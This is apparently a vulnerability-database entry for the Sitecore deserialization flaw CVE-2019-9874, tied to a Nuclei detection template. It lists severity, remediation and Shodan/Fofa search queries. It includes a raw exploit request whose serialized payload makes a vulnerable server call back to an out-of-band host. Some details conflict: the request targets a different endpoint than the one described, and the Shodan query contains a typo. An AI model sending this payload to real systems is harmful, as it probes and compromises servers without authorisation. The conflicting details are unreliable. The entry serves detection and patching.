| Title | Sitecore Experience Platform - Deserialization of Untrusted Data |
|---|---|
| Author | ritikchaddha |
| Severity | Critical |
| Impact | Attackers can execute arbitrary code remotely, potentially leading to full system compromise. |
| Remediation | Update to the latest version of Sitecore or apply security patches addressing deserialization issues. |
| CVSS Score | 9.8 |
| EPSS Score | 0.75396 |
| CVE ID | CVE-2019-9874 |
| CWE ID | CWE-502 |
| Shodan Query | http.html:"SitecoSitecore Experience Platform" |
| Fofa Query | body="Sitecore Experience Platform" |
| Tags | cve cve2019 sitecore deserialization rce kev vkev vuln |
Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.
POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Content-Length: 464
Content-Type: application/x-www-form-urlencoded
Cookie: __CSRFCOOKIE=38FZvQ3AjZKmUVJSrRWCqQkBSXl;
Accept-Encoding: gzip
__CSRFTOKEN=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAK2Q1anBsaGhsZTBvM2ZjNTZydmpnaDRuNGNpOTZheXdrNi5vYXN0LnNpdGV0AABxAH4ABXQABGh0dHBzcHh0ADNodHRwczovL2Q1anBsaGhsZTBvM2ZjNTZydmpnaDRuNGNpOTZheXdrNi5vYXN0LnNpdGV4
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9874.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-9874.pcap
N/AN/A